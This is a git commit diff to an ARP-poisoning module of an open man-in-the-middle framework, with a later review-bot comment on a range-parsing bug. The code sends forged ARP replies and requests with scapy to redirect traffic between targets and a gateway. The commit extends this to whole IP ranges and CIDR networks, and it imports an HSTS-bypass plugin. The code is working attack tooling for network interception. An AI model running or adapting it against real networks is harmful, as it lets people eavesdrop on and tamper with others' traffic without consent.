byt3bl33d3r 2015-06-08 13:38:45 +02:00
commit e3aa8ba617
3 changed files with 132 additions and 56 deletions


@ -1,5 +1,8 @@
import logging import logging
import threading import threading
from traceback import print_exc
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from time import sleep from time import sleep
from core.utils import shutdown from core.utils import shutdown
from scapy.all import * from scapy.all import *
@ -10,7 +13,11 @@ class ARPpoisoner():
def __init__(self, gateway, interface, mac, targets): def __init__(self, gateway, interface, mac, targets):
self.gatewayip = gateway try:
self.gatewayip = str(IPAddress(gateway))
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address as gateway")
self.gatewaymac = getmacbyip(gateway) self.gatewaymac = getmacbyip(gateway)
self.mymac = mac self.mymac = mac
self.targets = self.getTargetRange(targets) self.targets = self.getTargetRange(targets)
@ -24,22 +31,26 @@ class ARPpoisoner():
if targets is None: if targets is None:
return None return None
targetList = list() try:
targets = targets.split(",") targetList = []
for target in targets:
if "-" in target: for target in targets.split(','):
max_range = int(target.split("-")[1]) if '/' in target:
octets = target.split("-")[0].split(".") targetList.append(IPNetwork(target))
f3_octets = ".".join(octets[0:3])
l_octet = int(octets[3]) elif '-' in target:
first_half = target.split('-')[0]
second_half = first_half + target.split('-')[1]
targetList.append(IPRange(first_half, second_half))
for ip in xrange(l_octet, max_range+1):
targetList.append('{}.{}'.format(f3_octets, ip))
else: else:
targetList.append(target) targetList.append(IPAddress(target))
return targetList return targetList
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address/range/network as target")
def start(self): def start(self):
if self.gatewaymac is None: if self.gatewaymac is None:
shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address") shutdown("[ARPpoisoner] Error: Could not resolve gateway's MAC address")
@ -81,7 +92,11 @@ class ARPpoisoner():
elif self.targets: elif self.targets:
#Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
for targetip in self.targets: for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -90,7 +105,6 @@ class ARPpoisoner():
elif targetmac: elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug) send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e: except Exception as e:
@ -98,6 +112,24 @@ class ARPpoisoner():
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
print_exc()
pass
sleep(self.interval) sleep(self.interval)
def poisonARPreq(self): def poisonARPreq(self):
@ -108,7 +140,11 @@ class ARPpoisoner():
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
elif self.targets: elif self.targets:
for targetip in self.targets:
for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -117,7 +153,6 @@ class ARPpoisoner():
elif targetmac: elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e: except Exception as e:
@ -125,6 +160,23 @@ class ARPpoisoner():
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
sleep(self.interval) sleep(self.interval)
def restoreNet(self, count): def restoreNet(self, count):
@ -133,7 +185,11 @@ class ARPpoisoner():
sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
def restoreTarget(self, count): def restoreTarget(self, count):
for targetip in self.targets: for target in self.targets:
if type(target) is IPAddress:
targetip = str(target)
try: try:
targetmac = getmacbyip(targetip) targetmac = getmacbyip(targetip)
@ -144,10 +200,28 @@ class ARPpoisoner():
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
sleep(0.3)
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug) send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=str(targetip), hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=str(targetip), psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
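Review bot: In getTargetRange the new `-` branch builds the end of the range by string concatenation, `second_half = first_half + target.split('-')[1]`, so a specification such as `10.0.0.5-20` (constructed example) becomes `10.0.0.520`; netaddr rejects that, and the except clause shuts the tool down on input the removed code accepted. When the right-hand side is a bare number, derive the end address from the start's leading octets, for example `start, _, end = target.partition('-')` followed by `if '.' not in end: end = start.rsplit('.', 1)[0] + '.' + end`, and pass both to `IPRange(start, end)`. Separately, `__init__` validates `gateway` through `IPAddress` but still passes the raw string to `getmacbyip(gateway)`; using `self.gatewayip` there would make the validated value the only one in use. Indentation is lost in this rendering, so the nesting of these lines is inferred.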


@ -24,6 +24,7 @@ import logging
from plugins.plugin import Plugin from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef from core.servers.dns.DNSchef import DNSChef
from core.utils import IpTables
class HSTSbypass(Plugin): class HSTSbypass(Plugin):
name = 'SSLstrip+' name = 'SSLstrip+'


@ -1,5 +1,6 @@
Twisted Twisted
requests requests
netaddr
scapy scapy
msgpack-python msgpack-python
dnspython dnspython